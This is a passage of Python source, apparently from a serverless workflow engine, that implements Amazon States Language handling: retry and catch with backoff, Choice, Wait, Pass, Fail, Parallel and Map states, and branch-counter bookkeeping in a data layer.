#@retry(ZeroDivisionError, tries=10, delay=1) # ToDo: parse parameters of retryers and catchers
#@retry([x[0] for x in self.asl_errors], tries=3, delay=2) # ToDo: parse parameters of retryers and catchers
#@retry("States.ALL", tries=3, delay=2)
def exec_function_catch_retry(self, runtime, exec_arguments, sapi):
retryer = self.retry_list
catcher = self.catcher_list
ret_error_list = []
ret_interval_seconds = 0
ret_backoff_rate = 0
ret_max_attempts = 0
cat_next = ""
ret_value = []
for ret in retryer:
ret_error_list = ret['ErrorEquals']
self._logger.debug("[StateUtils] found a ASL workflow retryer, retry for: " + str(ret_error_list))
try:
ret_value = self._exec_function(runtime, exec_arguments, sapi)
return ret_value
except Exception as exc:
self._logger.debug("[StateUtils] retryer just caught an error: " + ", " + str(exc) + ", " + str(exc.__class__.__name__) + ", " + str(retryer))
ret_max_attempts, ret_interval_seconds, ret_backoff_rate = self.find_ret_data(exc, retryer) # get the retry data for this error
delay = int(ret_interval_seconds)
max_attempts = int(ret_max_attempts)
backoff_rate = float(ret_backoff_rate)
# start retrying on this error
while max_attempts:
try:
ret_value = self._exec_function(runtime, exec_arguments, sapi)
return ret_value
except Exception as e_retry:
if (any(str(e_retry) in s0 for s0 in ret_error_list) or any(e_retry.__class__.__name__ in s1 for s1 in ret_error_list)):
self._logger.debug("[StateUtils] MFn ASL retryer just caught an error:" + str(e_retry) + str(retryer))
self._logger.debug("[StateUtils] retrying for Error: " + str(e_retry) + ", remaining attempts: " + str(max_attempts))
max_attempts -= 1
if not max_attempts:
ret_value = {"Error": str(exc), "Cause": "Error not caught by MFn ASL Workflow retryer"}
self._logger.error("[StateUtils] Error not caught by MFn ASL Workflow retryer!")
return ret_value
#raise # max retries have been reached
self._logger.warning('%s, retrying in %s seconds... ' % (e_retry, str(delay)))
time.sleep(delay)
delay *= backoff_rate
if catcher:
self._logger.debug("[StateUtils] found a ASL workflow catcher")
# there was no retry information provided for this function, proceed with catch
ret_value = {"Error": "Catcher", "Cause": "error caught by MFn ASL Workflow catcher"}
try:
ret_value = self._exec_function(runtime, exec_arguments, sapi)
return ret_value
except Exception as exc:
exc_msg = str(exc)
self._logger.error("[StateUtils] catcher just caught an error: " + exc_msg + " " + str(catcher))
cat_next, cat_result = self.find_cat_data(exc, catcher)
if cat_next != []:
self._logger.error("[StateUtils] matching catch list entry target and result for this error: " + str(cat_next) + " " + str(cat_result))
self.result_path_dict['ResultPath'] = cat_result
ret_value = {"Error": exc_msg, "Cause": "this error caught by MFn ASL Workflow catcher!"}
if runtime == "java":
# do an extra serialization, because we were expecting a java output,
# but got a python object
val = {}
val["value"] = exc_msg
exc_msg = json.dumps(val)
sapi.add_dynamic_next(cat_next, exc_msg)
return ret_value
else: # no catcher could be found for this error
self._logger.error("[StateUtils] Error not caught by MFn ASL Workflow catcher!")
raise exc
else: # neither catcher nor retryers are set
ret_value = self._exec_function(runtime, exec_arguments, sapi)
return ret_value
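# A standalone sketch of the retry-with-backoff loop implemented above
# (generic form; `func`, `max_attempts`, `delay`, and `backoff_rate` are
# placeholders, not ASL field names):
#
#     import time
#
#     def retry_call(func, max_attempts=3, delay=1.0, backoff_rate=2.0):
#         while True:
#             try:
#                 return func()
#             except Exception:
#                 max_attempts -= 1
#                 if max_attempts <= 0:
#                     raise
#                 time.sleep(delay)
#                 delay *= backoff_rate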
def getChoiceResults(self, value_output):
choice_next_list = []
#self._logger.debug("[StateUtils] getChoiceResults Inputs: " + str(self.choiceNext) + str(self.functionstatetype))
if self.functionstatetype == self.choiceStateType and self.choiceNext != '':
choice_next_list.append({"next": self.choiceNext, "value": value_output})
return choice_next_list
def evaluateChoiceConditions(self, function_input):
self.choiceNext = ''
self.choiceNext = self.evaluateNextState(function_input)
self._logger.debug("[StateUtils] Evaluated Choice condition: " + str(self.choiceNext))
def evaluateMapState(self, function_input, key, metadata, sapi):
name_prefix = self.functiontopic + "_" + key
if "MaxConcurrency" in self.parsedfunctionstateinfo:
maxConcurrency = self.parsedfunctionstateinfo["MaxConcurrency"]
else:
maxConcurrency = 0
self.parsedfunctionstateinfo["MaxConcurrency"] = maxConcurrency
if "Parameters" in self.parsedfunctionstateinfo:
mapParameters = self.parsedfunctionstateinfo["Parameters"]
else:
mapParameters = {}
self._logger.debug("[StateUtils] evaluateMapState, maxConcurrency: " + str(maxConcurrency))
self._logger.debug("[StateUtils] evaluateMapState metadata: " + str(metadata))
counter_name_topic = self.sandboxid + "-" + self.workflowid + "-" + self.functionstatename
total_branch_count = len(function_input) # all branches executed concurrently
klist = [total_branch_count]
self.parsedfunctionstateinfo["BranchCount"] = int(total_branch_count) # overwrite parsed BranchCount with new value
self._logger.debug("[StateUtils] evaluateMapState, total_branch_count: " + str(total_branch_count))
# prepare counter metadata
counter_metadata = {}
counter_metadata["__state_action"] = "post_map_processing"
counter_metadata["__async_execution"] = metadata["__async_execution"]
workflow_instance_metadata_storage_key = name_prefix + "_workflow_metadata"
counter_metadata["WorkflowInstanceMetadataStorageKey"] = workflow_instance_metadata_storage_key
counter_metadata["CounterValue"] = 0 # this should be updated by riak hook
counter_metadata["Klist"] = klist
counter_metadata["TotalBranches"] = total_branch_count
counter_metadata["ExecutionId"] = key
counter_metadata["FunctionTopic"] = self.functiontopic
counter_metadata["Endpoint"] = self._internal_endpoint
iterator = self.parsedfunctionstateinfo["Iterator"]
counter_name_trigger_metadata = {"k-list": klist, "total-branches": total_branch_count}
# dynamic values used for generation of branches
counter_name_key = key
branch_out_keys = []
for i in range(total_branch_count):
branch_out_key = key + "-branch-" + str(i+1)
branch_out_keys.append(branch_out_key)
# prepare counter name value metadata
counter_name_value_metadata = copy.deepcopy(metadata)
counter_name_value_metadata["WorkflowInstanceMetadataStorageKey"] = workflow_instance_metadata_storage_key
counter_name_value_metadata["CounterValue"] = 0 # this should be updated by riak hook
counter_name_value_metadata["__state_action"] = "post_map_processing"
counter_name_value_metadata["state_counter"] = metadata["state_counter"]
self._logger.debug("[StateUtils] evaluateMapState, metadata[state_counter]: " + str(metadata["state_counter"]))
self.mapStateCounter = int(metadata["state_counter"])
counter_name_value = {"__mfnmetadata": counter_name_value_metadata, "__mfnuserdata": '{}'}
CounterName = json.dumps([str(counter_name_topic), str(counter_name_key), counter_name_trigger_metadata, counter_name_value])
# prepare mapInfo metadata
workflow_instance_outputkeys_set_key = key +"_"+ self.functionstatename + "_outputkeys_set"
mapInfo = {}
mapInfo["CounterTopicName"] = counter_name_topic
mapInfo["CounterNameKey"] = counter_name_key
mapInfo["TriggerMetadata"] = counter_name_trigger_metadata
mapInfo["CounterNameValueMetadata"] = counter_name_value_metadata
mapInfo["BranchOutputKeys"] = branch_out_keys
mapInfo["CounterName"] = CounterName
mapInfo["MaxConcurrency"] = maxConcurrency
mapInfo["BranchOutputKeysSetKey"] = workflow_instance_outputkeys_set_key
mapInfo["Klist"] = klist
mapInfo_key = self.functionstatename + "_" + key + "_map_info"
metadata[mapInfo_key] = mapInfo
# create counter for Map equivalent Parallel state
assert py3utils.is_string(CounterName)
counterName = str(mapInfo["CounterName"])
counter_metadata_key_name = counterName + "_metadata"
try:
dlc = DataLayerClient(locality=1, suid=self._storage_userid, is_wf_private=False, connect=self._datalayer)
# create a triggerable counter to start the post-parallel when parallel state finishes
dlc.createCounter(CounterName, 0, tableName=dlc.countertriggerstable)
dlc.put(counter_metadata_key_name, json.dumps(counter_metadata), tableName=dlc.countertriggersinfotable)
except Exception as exc:
self._logger.error("Exception in creating counter: " + str(exc))
self._logger.error(exc)
raise
finally:
dlc.shutdown()
assert py3utils.is_string(workflow_instance_metadata_storage_key)
self._logger.debug("[StateUtils] full_metadata_encoded put key: " + str(workflow_instance_metadata_storage_key))
sapi.put(workflow_instance_metadata_storage_key, json.dumps(metadata))
# Now provide each branch with its own input
branch = self.parsedfunctionstateinfo["Iterator"] # this is just one set
# launch a branch for each input element
startat = str(branch["StartAt"])
for i in range(len(function_input)):
sapi.add_dynamic_next(startat, function_input[i]) # Alias for add_workflow_next(self, next, value)
sapi.put(name_prefix + "_" + "mapStateInputValue", str(function_input[i]))
sapi.put(name_prefix + "_" + "mapStateInputIndex", str(i))
self._logger.debug("\t Map State StartAt:" + startat)
self._logger.debug("\t Map State input:" + str(function_input[i]))
return function_input, metadata
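# A standalone sketch of the fan-out bookkeeping evaluateMapState performs
# above: one branch per input element plus a trigger counter that fires the
# post-map step once every branch has reported. Placeholder names only, not
# the MFn data-layer API:
#
#     execution_id = 'exec-123'      # hypothetical
#     inputs = [10, 20, 30]
#     branch_out_keys = ['%s-branch-%d' % (execution_id, i + 1)
#                        for i in range(len(inputs))]
#     # a counter starts at 0 and is incremented once per finished branch;
#     # when it reaches len(inputs) the post_map_processing action is triggered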
def evaluatePostMap(self, function_input, key, metadata, sapi):
name_prefix = self.functiontopic + "_" + key
# function is triggered by post-commit hook with metadata containing information about state results in buckets.
# It collects these results and returns metadata and post_map_output_results
action = metadata["__state_action"]
assert action == "post_map_processing"
counterValue = function_input["CounterValue"]
state_counter = 0
if "state_counter" in metadata:
state_counter = metadata["state_counter"]
self._logger.debug("\t metadata:" + json.dumps(metadata))
workflow_instance_metadata_storage_key = str(function_input["WorkflowInstanceMetadataStorageKey"])
assert py3utils.is_string(workflow_instance_metadata_storage_key)
full_metadata_encoded = sapi.get(workflow_instance_metadata_storage_key)
self._logger.debug("[StateUtils] full_metadata_encoded get: " + str(full_metadata_encoded))
full_metadata = json.loads(full_metadata_encoded)
full_metadata["state_counter"] = state_counter
mapInfoKey = self.functionstatename + "_" + key + "_map_info"
mapInfo = full_metadata[mapInfoKey]
branchOutputKeysSetKey = str(mapInfo["BranchOutputKeysSetKey"])
branchOutputKeysSet = sapi.retrieveSet(branchOutputKeysSetKey)
self._logger.debug("\t branchOutputKeysSet: " + str(branchOutputKeysSet))
if not branchOutputKeysSet:
self._logger.error("[StateUtils] branchOutputKeysSet is empty")
raise Exception("[StateUtils] branchOutputKeysSet is empty")
klist = mapInfo["Klist"]
#self._logger.debug("\t action: " + action)
#self._logger.debug("\t counterValue:" + str(counterValue))
#self._logger.debug("\t WorkflowInstanceMetadataStorageKey:" + metadata["WorkflowInstanceMetadataStorageKey"])
#self._logger.debug("\t full_metadata:" + full_metadata_encoded)
#self._logger.debug("\t mapInfoKey: " + mapInfoKey)
#self._logger.debug("\t mapInfo:" + json.dumps(mapInfo))
#self._logger.debug("\t branchOutputKeysSetKey:" + branchOutputKeysSetKey)
#self._logger.debug("\t branchOutputKeysSet:" + str(branchOutputKeysSet))
#self._logger.debug("\t klist:" + str(klist))
NumBranchesFinished = abs(counterValue)
self._logger.debug("\t NumBranchesFinished:" + str(NumBranchesFinished))
do_cleanup = False
if klist[-1] == NumBranchesFinished:
do_cleanup = True
self._logger.debug("\t do_cleanup:" + str(do_cleanup))
counterName = str(mapInfo["CounterName"])
counter_metadata_key_name = counterName + "_metadata"
assert py3utils.is_string(counterName)
if do_cleanup:
assert py3utils.is_string(counterName)
try:
dlc = DataLayerClient(locality=1, suid=self._storage_userid, is_wf_private=False, connect=self._datalayer)
# done with the triggerable counter
dlc.deleteCounter(counterName, tableName=dlc.countertriggerstable)
dlc.delete(counter_metadata_key_name, tableName=dlc.countertriggersinfotable)
except Exception as exc:
self._logger.error("Exception deleting counter: " + str(exc))
self._logger.error(exc)
raise
finally:
dlc.shutdown()
post_map_output_values = []
self._logger.debug("\t mapInfo_BranchOutputKeys:" + str(mapInfo["BranchOutputKeys"]))
self._logger.debug("\t mapInfo_BranchOutputKeys length: " + str(len(mapInfo["BranchOutputKeys"])))
for outputkey in mapInfo["BranchOutputKeys"]:
outputkey = str(outputkey)
if outputkey in branchOutputKeysSet: # mapInfo["BranchOutputKeys"]:
self._logger.debug("\t BranchOutputKey:" + outputkey)
while sapi.get(outputkey) == "":
time.sleep(0.1) # wait until value is available
branchOutput = sapi.get(outputkey)
branchOutput_decoded = json.loads(branchOutput)
self._logger.debug("\t branchOutput(type):" + str(type(branchOutput)))
self._logger.debug("\t branchOutput:" + branchOutput)
self._logger.debug("\t branchOutput_decoded(type):" + str(type(branchOutput_decoded)))
self._logger.debug("\t branchOutput_decoded:" + str(branchOutput_decoded))
post_map_output_values = post_map_output_values + [branchOutput_decoded]
if do_cleanup:
sapi.delete(outputkey) # cleanup the key from data layer
self._logger.debug("\t cleaned output key:" + outputkey)
else:
post_map_output_values = post_map_output_values + [None]
self._logger.debug("\t this_BranchOutputKeys is not contained: " + str(outputkey))
self._logger.debug("\t post_map_output_values:" + str(post_map_output_values))
while (sapi.get(name_prefix + "_" + "mapStatePartialResult")) == "":
time.sleep(0.1) # wait until value is available
mapStatePartialResult = ast.literal_eval(sapi.get(name_prefix + "_" + "mapStatePartialResult"))
mapStatePartialResult += post_map_output_values
sapi.put(name_prefix + "_" + "mapStatePartialResult", str(mapStatePartialResult))
# now apply ResultPath and OutputPath
if do_cleanup:
sapi.deleteSet(branchOutputKeysSetKey)
if ast.literal_eval(sapi.get(name_prefix + "_" + "mapInputCount")) == len(mapStatePartialResult):
# we are ready to publish but need to honour ResultPath and OutputPath
res_raw = ast.literal_eval(sapi.get(name_prefix + "_" +"mapStatePartialResult"))
# remove unwanted keys from input before publishing
function_input = {}
function_input_post_result = self.applyResultPath(function_input, res_raw)
function_input_post_output = self.applyOutputPath(function_input_post_result)
if "Next" in self.parsedfunctionstateinfo:
if self.parsedfunctionstateinfo["Next"]:
sapi.add_dynamic_next(self.parsedfunctionstateinfo["Next"], function_input_post_output )
if "End" in self.parsedfunctionstateinfo:
if self.parsedfunctionstateinfo["End"]:
sapi.add_dynamic_next("end", function_input_post_output)
sapi.delete(name_prefix + "_" + "mapInputCount")
sapi.delete(name_prefix + "_" + "mapStateInputIndex")
sapi.delete(name_prefix + "_" + "mapStateInputValue")
sapi.delete(name_prefix + "_" + "mapStatePartialResult")
sapi.delete(name_prefix + "_" + "tobeProcessedlater")
post_map_output_values = function_input_post_output
return post_map_output_values, full_metadata
def evaluateParallelState(self, function_input, key, metadata, sapi):
name_prefix = self.functiontopic + "_" + key
total_branch_count = self.parsedfunctionstateinfo["BranchCount"]
assert total_branch_count == len(self.parsedfunctionstateinfo["Branches"])
klist = []
if "WaitForNumBranches" in self.parsedfunctionstateinfo:
klist = self.parsedfunctionstateinfo["WaitForNumBranches"]
if not isinstance(klist, list):
self._logger.info("(StateUtils) WaitForNumBranches must be a sorted list with 1 or more integers")
raise Exception("(StateUtils) WaitForNumBranches must be a sorted list with 1 or more integers")
klist.sort()
for k in klist:
if not isinstance(k, int):
self._logger.info("(StateUtils) Values inside WaitForNumBranches must be integers")
raise Exception("(StateUtils) Values inside WaitForNumBranches must be integers")
if k > total_branch_count:
self._logger.info("(StateUtils) Values inside WaitForNumBranches list cannot be greater than the number of branches in the parallel state")
raise Exception("(StateUtils) Values inside WaitForNumBranches list cannot be greater than the number of branches in the parallel state")
else:
klist.append(total_branch_count)
counter_name_topic = self.sandboxid + "-" + self.workflowid + "-" + self.functionstatename
counter_name_trigger_metadata = {"k-list": klist, "total-branches": total_branch_count}
counter_name_key = key
# dynamic values
branch_out_keys = []
for i in range(total_branch_count):
branch_out_key = name_prefix + "_branch_" + str(i+1)
branch_out_keys.append(branch_out_key)
# prepare counter metadata
counter_metadata = {}
counter_metadata["__state_action"] = "post_parallel_processing"
counter_metadata["__async_execution"] = metadata["__async_execution"]
workflow_instance_metadata_storage_key = name_prefix + "_workflow_metadata"
counter_metadata["WorkflowInstanceMetadataStorageKey"] = workflow_instance_metadata_storage_key
counter_metadata["CounterValue"] = 0 # this should be updated by riak hook
counter_metadata["Klist"] = klist
counter_metadata["TotalBranches"] = total_branch_count
counter_metadata["ExecutionId"] = key
counter_metadata["FunctionTopic"] = self.functiontopic
counter_metadata["Endpoint"] = self._internal_endpoint
# prepare counter name value metadata
counter_name_value_metadata = copy.deepcopy(metadata)
counter_name_value_metadata["WorkflowInstanceMetadataStorageKey"] = workflow_instance_metadata_storage_key
counter_name_value_metadata["CounterValue"] = 0 # this should be updated by riak hook
counter_name_value_metadata["__state_action"] = "post_parallel_processing"
counter_name_value_metadata["state_counter"] = metadata["state_counter"]
counter_name_value = {"__mfnmetadata": counter_name_value_metadata, "__mfnuserdata": '{}'}
CounterName = json.dumps([str(counter_name_topic), str(counter_name_key), counter_name_trigger_metadata, counter_name_value])
#CounterName = name_prefix + "_counter"
counter_metadata_key_name = CounterName + "_metadata"
workflow_instance_outputkeys_set_key = name_prefix + "_outputkeys_set"
# prepare parallelInfo metadata
parallelInfo = {}
parallelInfo["CounterName"] = CounterName
parallelInfo["BranchOutputKeys"] = branch_out_keys
parallelInfo["BranchOutputKeysSetKey"] = workflow_instance_outputkeys_set_key
parallelInfo["Klist"] = klist
parallelInfo["TotalBranches"] = total_branch_count
parallelInfo["ExecutionId"] = key
parallelInfo["FunctionTopic"] = self.functiontopic
parallelInfo["Endpoint"] = self._internal_endpoint
parallelInfo_key = self.functionstatename + "_" + key + "_parallel_info"
metadata[parallelInfo_key] = parallelInfo
assert py3utils.is_string(CounterName)
try:
dlc = DataLayerClient(locality=1, suid=self._storage_userid, is_wf_private=False, connect=self._datalayer)
# create a triggerable counter to start the post-parallel when parallel state finishes
dlc.createCounter(CounterName, 0, tableName=dlc.countertriggerstable)
dlc.put(counter_metadata_key_name, json.dumps(counter_metadata), tableName=dlc.countertriggersinfotable)
except Exception as exc:
self._logger.error("Exception in creating counter: " + str(exc))
self._logger.error(exc)
raise
finally:
dlc.shutdown()
assert py3utils.is_string(workflow_instance_metadata_storage_key)
sapi.put(workflow_instance_metadata_storage_key, json.dumps(metadata))
branches = self.parsedfunctionstateinfo["Branches"]
for branch in branches:
startat = str(branch["StartAt"])
sapi.add_dynamic_next(startat, function_input)
return function_input, metadata
def processBranchTerminalState(self, key, value_output, metadata, sapi):
if 'End' not in self.parsedfunctionstateinfo:
return
if self.parsedfunctionstateinfo["End"] and "ParentParallelInfo" in self.parsedfunctionstateinfo:
parentParallelInfo = self.parsedfunctionstateinfo["ParentParallelInfo"]
parallelName = parentParallelInfo["Name"]
branchCounter = parentParallelInfo["BranchCounter"]
#self._logger.debug("[StateUtils] processBranchTerminalState: ")
#self._logger.debug("\t ParentParallelInfo:" + json.dumps(parentParallelInfo))
#self._logger.debug("\t parallelName:" + parallelName)
#self._logger.debug("\t branchCounter: " + str(branchCounter))
#self._logger.debug("\t key:" + key)
#self._logger.debug("\t metadata:" + json.dumps(metadata))
#self._logger.debug("\t value_output(type):" + str(type(value_output)))
#self._logger.debug("\t value_output:" + value_output)
parallelInfoKey = parallelName + "_" + key + "_parallel_info"
#self._logger.debug("\t parallelInfoKey:" + parallelInfoKey)
if parallelInfoKey in metadata:
parallelInfo = metadata[parallelInfoKey]
counterName = str(parallelInfo["CounterName"])
branchOutputKeys = parallelInfo["BranchOutputKeys"]
branchOutputKey = str(branchOutputKeys[branchCounter-1])
branchOutputKeysSetKey = str(parallelInfo["BranchOutputKeysSetKey"])
#self._logger.debug("\t branchOutputKey:" + branchOutputKey)
#self._logger.debug("\t branchOutputKeysSetKey:" + branchOutputKeysSetKey)
assert py3utils.is_string(branchOutputKey)
sapi.put(branchOutputKey, value_output)
assert py3utils.is_string(branchOutputKeysSetKey)
sapi.addSetEntry(branchOutputKeysSetKey, branchOutputKey)
assert py3utils.is_string(counterName)
try:
dlc = DataLayerClient(locality=1, suid=self._storage_userid, is_wf_private=False, connect=self._datalayer)
# increment the triggerable counter
dlc.incrementCounter(counterName, 1, tableName=dlc.countertriggerstable)
except Exception as exc:
self._logger.error("Exception incrementing counter: " + str(exc))
self._logger.error(exc)
raise
finally:
dlc.shutdown()
else:
self._logger.error("[StateUtils] processBranchTerminalState Unable to find ParallelInfo")
raise Exception("processBranchTerminalState Unable to find ParallelInfo")
if self.parsedfunctionstateinfo["End"] and "ParentMapInfo" in self.parsedfunctionstateinfo:
parentMapInfo = self.parsedfunctionstateinfo["ParentMapInfo"]
mapName = parentMapInfo["Name"]
mapInfoKey = mapName + "_" + key + "_map_info"
branchCounter = parentMapInfo["BranchCounter"]
#self._logger.debug("[StateUtils] processBranchTerminalState: ")
#self._logger.debug("\t ParentMapInfo:" + json.dumps(parentMapInfo))
#self._logger.debug("\t mapName:" + mapName)
#self._logger.debug("\t branchCounter: " + str(branchCounter))
#self._logger.debug("\t key:" + key)
#self._logger.debug("\t metadata:" + json.dumps(metadata))
#self._logger.debug("\t value_output(type):" + str(type(value_output)))
#self._logger.debug("\t value_output:" + value_output)
if mapInfoKey in metadata:
mapInfo = metadata[mapInfoKey]
rest = metadata["__function_execution_id"].split("_")[1:]
for codes in rest: # find marker for map state and use it to calculate current index
if "-M" in codes:
index = rest.index(codes)
current_index = int(rest[index].split("-M")[0])
self._logger.debug("[StateUtils] current_index: " + str(current_index))
if mapInfo["MaxConcurrency"] != 0:
current_index = current_index % int(mapInfo["MaxConcurrency"])
counterName = str(mapInfo["CounterName"])
branchOutputKeys = mapInfo["BranchOutputKeys"]
branchOutputKey = str(branchOutputKeys[current_index])
branchOutputKeysSetKey = str(mapInfo["BranchOutputKeysSetKey"])
self._logger.debug("\t branchOutputKey:" + branchOutputKey)
self._logger.debug("\t branchOutputKeysSetKey:" + branchOutputKeysSetKey)
assert py3utils.is_string(branchOutputKey)
sapi.put(branchOutputKey, value_output)
assert py3utils.is_string(branchOutputKeysSetKey)
sapi.addSetEntry(branchOutputKeysSetKey, branchOutputKey)
assert py3utils.is_string(counterName)
try:
dlc = DataLayerClient(locality=1, suid=self._storage_userid, is_wf_private=False, connect=self._datalayer)
# increment the triggerable counter
dlc.incrementCounter(counterName, 1, tableName=dlc.countertriggerstable)
except Exception as exc:
self._logger.error("Exception incrementing counter: " + str(exc))
self._logger.error(exc)
raise
finally:
dlc.shutdown()
else:
self._logger.error("[StateUtils] processBranchTerminalState Unable to find MapInfo")
raise Exception("processBranchTerminalState Unable to find MapInfo")
def evaluatePostParallel(self, function_input, key, metadata, sapi):
action = metadata["__state_action"]
assert action == "post_parallel_processing"
counterValue = function_input["CounterValue"]
workflow_instance_metadata_storage_key = str(function_input["WorkflowInstanceMetadataStorageKey"])
assert py3utils.is_string(workflow_instance_metadata_storage_key)
full_metadata_encoded = sapi.get(workflow_instance_metadata_storage_key)
full_metadata = json.loads(full_metadata_encoded)
parallelInfoKey = self.functionstatename + "_" + key + "_parallel_info"
parallelInfo = full_metadata[parallelInfoKey]
branchOutputKeysSetKey = str(parallelInfo["BranchOutputKeysSetKey"])
branchOutputKeysSet = sapi.retrieveSet(branchOutputKeysSetKey)
if not branchOutputKeysSet:
self._logger.error("[StateUtils] branchOutputKeysSet is empty")
raise Exception("[StateUtils] branchOutputKeysSet is empty")
klist = parallelInfo["Klist"]
NumBranchesFinished = abs(counterValue)
do_cleanup = False
if klist[-1] == NumBranchesFinished:
do_cleanup = True
counterName = str(parallelInfo["CounterName"])
assert py3utils.is_string(counterName)
counter_metadata_key_name = counterName + "_metadata"
if do_cleanup:
assert py3utils.is_string(counterName)
try:
dlc = DataLayerClient(locality=1, suid=self._storage_userid, is_wf_private=False, connect=self._datalayer)
# done with the triggerable counter
dlc.deleteCounter(counterName, tableName=dlc.countertriggerstable)
dlc.delete(counter_metadata_key_name, tableName=dlc.countertriggersinfotable)
except Exception as exc:
self._logger.error("Exception deleting counter: " + str(exc))
self._logger.error(exc)
raise
finally:
dlc.shutdown()
sapi.delete(workflow_instance_metadata_storage_key)
post_parallel_output_values = []
for outputkey in parallelInfo["BranchOutputKeys"]:
outputkey = str(outputkey)
if outputkey in branchOutputKeysSet:
while sapi.get(outputkey) == "":
time.sleep(0.1) # wait until value is available
branchOutput = sapi.get(outputkey)
branchOutput_decoded = json.loads(branchOutput)
post_parallel_output_values = post_parallel_output_values + [branchOutput_decoded]
if do_cleanup:
sapi.delete(outputkey) # cleanup the key from data layer
else:
post_parallel_output_values = post_parallel_output_values + [None]
if do_cleanup:
sapi.deleteSet(branchOutputKeysSetKey)
if "Next" in self.parsedfunctionstateinfo:
sapi.add_dynamic_next(self.parsedfunctionstateinfo["Next"], post_parallel_output_values)
if "End" in self.parsedfunctionstateinfo:
if self.parsedfunctionstateinfo["End"]:
sapi.add_dynamic_next("end", post_parallel_output_values)
return function_input, full_metadata
def evaluateNonTaskState(self, function_input, key, metadata, sapi):
# 3. Evaluate Non Task states
#self._logger.debug("[StateUtils] NonTask state type: " + str(self.functionstatetype))
#self._logger.debug("[StateUtils] Welcome to evaluateNonTaskState! Current key:" + str(key))
function_output = None
if self.functionstatetype == StateUtils.choiceStateType:
#self._logger.debug("[StateUtils] Choice state info:" + str(self.functionstateinfo))
self.evaluateChoiceConditions(function_input) # this sets chosen Next state
#self._logger.debug("[StateUtils] Choice state Next:" + str(self.choiceNext))
function_output = function_input # output of the Choice state
elif self.functionstatetype == StateUtils.waitStateType:
#self._logger.debug("[StateUtils] Wait state info:" + str(self.functionstateinfo))
function_output = function_input
if "Seconds" in list(json.loads(self.functionstateinfo).keys()):
wait_state_seconds = json.loads(self.functionstateinfo)['Seconds']
#self._logger.debug("[StateUtils] Wait state seconds:" + str(wait_state_seconds))
time.sleep(float(wait_state_seconds))
elif "SecondsPath" in list(json.loads(self.functionstateinfo).keys()):
wait_state_secondspath = json.loads(self.functionstateinfo)['SecondsPath']
#self._logger.debug("[StateUtils] Wait state secondspath:" + str(wait_state_secondspath))
wait_state_secondspath_data = [match.value for match in parse(wait_state_secondspath).find(function_input)]
if wait_state_secondspath_data == []:
#self._logger.exception("[StateUtils] Wait state secondspath does not match: " + str(wait_state_secondspath))
raise Exception("Wait state secondspath does not match")
#self._logger.debug("[StateUtils] Wait state secondspath data parsed:" + str(wait_state_secondspath_data[0]))
time.sleep(float(wait_state_secondspath_data[0]))
elif "Timestamp" in list(json.loads(self.functionstateinfo).keys()):
wait_state_timestamp = json.loads(self.functionstateinfo)['Timestamp']
#self._logger.debug("[StateUtils] Wait state timestamp:" + str(wait_state_timestamp))
target_time = datetime.strptime(str(wait_state_timestamp), "%Y-%m-%dT%H:%M:%SZ")
current_time = datetime.utcnow()
#self._logger.debug("[StateUtils] Wait state timestamp difference" + str(current_time) + str(target_time))
remaining = (target_time - current_time).total_seconds()
#self._logger.debug("[StateUtils] Wait state timestamp remaining total_seconds:" + str(remaining))
remaining_time = float(remaining)
if remaining_time > 0:
time.sleep(remaining_time)
else:
self._logger.error("[StateUtils] Wait state timestamp target lies in the past!" + str(wait_state_timestamp))
elif "TimestampPath" in list(json.loads(self.functionstateinfo).keys()):
wait_state_timestamppath = json.loads(self.functionstateinfo)['TimestampPath']
self._logger.debug("[StateUtils] Wait state timestamppath:" + str(wait_state_timestamppath))
# need to communicate with datalayer for definition of trigger for hibernating/resuming task
wait_state_timestamppath_data = [match.value for match in parse(wait_state_timestamppath).find(function_input)]
if wait_state_timestamppath_data == []:
#self._logger.exception("[StateUtils] Wait state timestamp_path does not match: " + str(wait_state_timestamppath))
raise Exception("Wait state timestamp_path does not match")
self._logger.debug("[StateUtils] Wait state timestamppath data parsed:" + str(wait_state_timestamppath_data[0]))
target_time = datetime.strptime(str(wait_state_timestamppath_data[0]), "%Y-%m-%dT%H:%M:%SZ")
self._logger.debug("[StateUtils] Wait state timestamp data" + str(target_time))
current_time = datetime.utcnow()
self._logger.debug("[StateUtils] Wait state timestamp difference" + str(current_time) + str(target_time))
remaining = (target_time - current_time).total_seconds()
self._logger.debug("[StateUtils] Wait state timestamp remaining total_seconds:" + str(remaining))
remaining_time = float(remaining)
self._logger.debug("[StateUtils] Wait state timestamp remaining total_seconds:" + str(remaining_time))
if remaining_time > 0:
time.sleep(remaining_time)
else:
self._logger.error("[StateUtils] Wait state timestamp target lies in the past!" + str(wait_state_timestamppath_data[0]))
raise Exception("Wait state timestamp target lies in the past!" + str(wait_state_timestamppath_data[0]))
else:
raise Exception("Wait state: Missing required field")
elif self.functionstatetype == StateUtils.passStateType:
self._logger.debug("[StateUtils] Pass state handling, received value:" + str(function_input))
function_output = function_input
if "Result" in self.functionstateinfo:
pass_state_result = json.loads(self.functionstateinfo)['Result']
self._logger.debug("[StateUtils] Pass state result:" + str(pass_state_result))# self.functionstateinfo['Result']))
function_output = pass_state_result
elif self.functionstatetype == StateUtils.succeedStateType:
function_output = function_input
elif self.functionstatetype == StateUtils.failStateType:
self._logger.debug("[StateUtils] Fail state handling, received value:" + str(function_input))
self._logger.debug("[StateUtils] Fail state handling, received metadata:" + str(metadata))
if "Cause" in self.functionstateinfo:
fail_state_cause = json.loads(self.functionstateinfo)['Cause']
self._logger.debug("[StateUtils] Fail state cause info:" + str(fail_state_cause))
if "Error" in self.functionstateinfo:
error_state_error = json.loads(self.functionstateinfo)['Error']
self._logger.debug("[StateUtils] Fail state error info:" + str(error_state_error))
function_output = function_input
elif self.functionstatetype == StateUtils.parallelStateType:
self._logger.debug("[StateUtils] Parallel state handling function_input: " + str(function_input))
self._logger.debug("[StateUtils] Parallel state handling metadata: " + str(metadata))
self._logger.debug("[StateUtils] Parallel state handling")
if "__state_action" not in metadata or metadata["__state_action"] != "post_parallel_processing":
function_output, metadata = self.evaluateParallelState(function_input, key, metadata, sapi)
else:
if metadata["__state_action"] == "post_parallel_processing":
function_output, metadata = self.evaluatePostParallel(function_input, key, metadata, sapi)
elif self.functionstatetype == StateUtils.mapStateType:
name_prefix = self.functiontopic + "_" + key
self._logger.debug("[StateUtils] Map state handling function_input: " + str(function_input))
self._logger.debug("[StateUtils] Map state handling metadata: " + str(metadata))
if "MaxConcurrency" in self.parsedfunctionstateinfo.keys():
maxConcurrency = int(self.parsedfunctionstateinfo["MaxConcurrency"])
else:
maxConcurrency = 0
self._logger.debug("[StateUtils] Map state maxConcurrency: " + str(maxConcurrency))
